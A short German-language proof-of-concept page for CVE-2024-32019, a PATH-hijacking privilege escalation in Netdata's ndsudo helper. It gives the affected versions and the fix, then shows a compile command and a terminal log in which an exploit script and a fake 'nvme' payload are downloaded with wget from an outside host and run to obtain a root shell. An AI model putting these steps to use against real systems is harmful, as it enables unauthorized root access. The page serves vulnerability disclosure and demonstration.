
Netdata ndsudo Privilegieneskalation PoC
CVE-2024-32019 ist eine lokale Schwachstelle zur Privilegieneskalation im SUID-Helfer ndsudo von Netdata, die es einem lokalen Benutzer ermöglicht, beliebige Programme als root über einen nicht vertrauenswürdigen Suchpfad auszuführen (PATH-Hijacking).
Das Problem besteht darin, dass ndsudo die Befehlsnamen einschränkt, sie jedoch mithilfe des PATH des Aufrufers auflöst, sodass ein Benutzer eine schädliche Binärdatei weiter vorne im PATH platzieren und von ndsudo mit Root-Rechten ausführen lassen kann.
Betroffen sind Netdata Agent-Versionen ≥ v1.45.0 und < v1.45.3 sowie ≥ v1.44.0-60 und < v1.45.0-169; der CVSS-v3.1-Score beträgt 8.8 (Hoch).
Zur Behebung sollte auf v1.45.3 oder v1.45.0-169 aktualisiert werden; die Schwachstelle wird CWE-426 (Untrusted Search Path) zugeordnet.
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01-- http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
CVE-2024-32019.sh 100%[==================================================>] 712 --.-KB/s in 0s
2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10-- http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’
nvme 100%[==================================================>] 813.04K 1.98MB/s in 0.4s
2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#